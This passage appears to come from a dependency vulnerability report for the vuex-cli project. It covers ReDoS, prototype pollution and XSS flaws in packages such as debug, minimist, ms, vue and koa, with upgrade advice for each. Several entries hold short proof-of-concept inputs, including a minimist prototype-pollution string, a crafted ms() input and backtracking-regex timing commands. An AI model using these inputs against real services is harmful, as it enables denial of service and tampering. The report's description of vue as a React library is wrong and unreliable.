From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade clean-css to version 4.1.11 or higher.

References

low severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: debug
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 mocha@2.5.3 debug@2.2.0
    Remediation: Open PR to patch debug@2.2.0.

Overview

debug is a small debugging utility.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) in the function useColors via manipulation of the str argument. The vulnerability can cause a very low impact of about 2 seconds of matching time for data 50k characters long.

Note: CVE-2017-20165 is a duplicate of this vulnerability.

PoC

Use the following regex in the %o formatter.

/\s*\n\s*/

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade debug to version 2.6.9, 3.1.0, 3.2.7, 4.3.1 or higher.

References

low severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: eslint
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 eslint@1.10.3

Overview

eslint is a pluggable linting utility for JavaScript and JSX

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). This can cause an impact of about 10 seconds matching time for data 100k characters long.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade eslint to version 4.18.2 or higher.

References

low severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: mime
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 url-loader@0.5.9 mime@1.3.6

Overview

mime is a comprehensive, compact MIME type module.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). It uses regex the following regex /.*[\.\/\\]/ in its lookup, which can cause a slowdown of 2 seconds for 50k characters.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade mime to version 1.4.1, 2.0.3 or higher.

References

low severity

Prototype Pollution

  • Vulnerable module: minimist
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 mocha@2.5.3 mkdirp@0.5.1 minimist@0.0.8
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 webpack@1.15.0 optimist@0.6.1 minimist@0.0.10

Overview

minimist is a parse argument options module.

Affected versions of this package are vulnerable to Prototype Pollution due to a missing handler to Function.prototype.

Notes:

  • This vulnerability is a bypass to CVE-2020-7598

  • The reason for the different CVSS between CVE-2021-44906 to CVE-2020-7598, is that CVE-2020-7598 can pollute objects, while CVE-2021-44906 can pollute only function.

PoC by Snyk

require('minimist')('--_.constructor.constructor.prototype.foo bar'.split(' '));
console.log((function(){}).foo); // bar

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade minimist to version 0.2.4, 1.2.6 or higher.

References

low severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: ms
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 mocha@2.5.3 debug@2.2.0 ms@0.7.1
    Remediation: Open PR to patch ms@0.7.1.

Overview

ms is a tiny millisecond conversion utility.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to an incomplete fix for previously reported vulnerability npm:ms:20151024. The fix limited the length of accepted input string to 10,000 characters, and turned to be insufficient making it possible to block the event loop for 0.3 seconds (on a typical laptop) with a specially crafted string passed to ms() function.

Proof of concept

ms = require('ms');
ms('1'.repeat(9998) + 'Q') // Takes about ~0.3s

Note: Snyk's patch for this vulnerability limits input length to 100 characters. This new limit was deemed to be a breaking change by the author. Based on user feedback, we believe the risk of breakage is very low, while the value to your security is much greater, and therefore opted to still capture this change in a patch for earlier versions as well. Whenever patching security issues, we always suggest to run tests on your code to validate that nothing has been broken.

For more information on Regular Expression Denial of Service (ReDoS) attacks, go to our blog.

Disclosure Timeline

  • Feb 9th, 2017 - Reported the issue to package owner.
  • Feb 11th, 2017 - Issue acknowledged by package owner.
  • April 12th, 2017 - Fix PR opened by Snyk Security Team.
  • May 15th, 2017 - Vulnerability published.
  • May 16th, 2017 - Issue fixed and version 2.0.0 released.
  • May 21th, 2017 - Patches released for versions >=0.7.1, <=1.0.0.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade ms to version 2.0.0 or higher.

References

low severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: vue
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 vue@1.0.28

Overview

vue is a React UI component library that uses inline styles to avoid CSS dependencies and prevent leaky global styles from affecting an application.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks. This can cause an impact of about 10 seconds matching time for data 70k characters long.

Disclosure Timeline

  • Feb 19th, 2018 - Initial Disclosure to package owner
  • Feb 19th, 2018 - Initial Response from package owner
  • Feb 21th, 2018 - Fix issued
  • Feb 22th, 2018 - Vulnerability published

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Update vue to version 2.5.14 or higher.

References

low severity

Cross-site Scripting (XSS)

  • Vulnerable module: koa
  • Introduced through: koa@1.7.1

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli koa@1.7.1
    Remediation: Upgrade to koa@2.16.1.

Overview

koa is a Koa web app framework

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the ctx.redirect() function. An attacker can execute scripts on the user's browser or redirect users to malicious sites by supplying malicious input as an achor reference.

Workaround

This vulnerability can be mitigated by ensuring all user-supplied URLs are properly sanitized before being passed to ctx.redirect.

Details

Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade koa to version 2.16.1, 3.0.0-alpha.5 or higher.

References